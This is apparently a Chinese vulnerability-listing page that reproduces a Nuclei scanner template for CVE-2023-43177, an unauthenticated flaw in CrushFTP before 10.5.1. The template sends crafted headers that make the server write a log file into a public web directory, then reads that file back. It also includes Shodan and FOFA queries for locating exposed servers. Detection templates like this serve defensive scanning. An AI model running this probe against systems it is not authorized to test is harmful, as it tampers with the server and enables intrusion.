CVE-2023-43177: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution

日期: 2025-08-01 | 影响软件: CrushFTP | POC: 已公开

漏洞描述

CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.

PoC代码[已公开]

id: CVE-2023-43177

info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
    - https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.72886
    epss-percentile: 0.98739
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: crushftp
    product: crushftp
    shodan-query: http.html:"crushftp"
    fofa-query: body="crushftp"
  tags: cve,cve2023,crushftp,unauth,rce,intrusive,vkev
flow: http(1) && http(2) && http(3)

variables:
  dirname: "{{randbase(5)}}"
  filename: "{{randbase(5)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")

  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"

    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: crushadmin{{dirname}}
      user_log_path: "./WebInterface/{{dirname}}/"
      user_log_file: "{{filename}}"
      Content-Type: application/x-www-form-urlencoded

    body: |
      post=body

    matchers:
      - type: regex
        regex:
          - "crushadmin"

  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "crushadmin{{dirname}}")
        condition: and
# digest: 4a0a00473045022100f602297c25814c853a00bf068e978d83951b9d834e28e9b1451e131afaef8207022039d909ad4597111359073a0530fb08723c90223b51f53cbfa59fbb48709d87e9:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-43177.yaml

相关漏洞推荐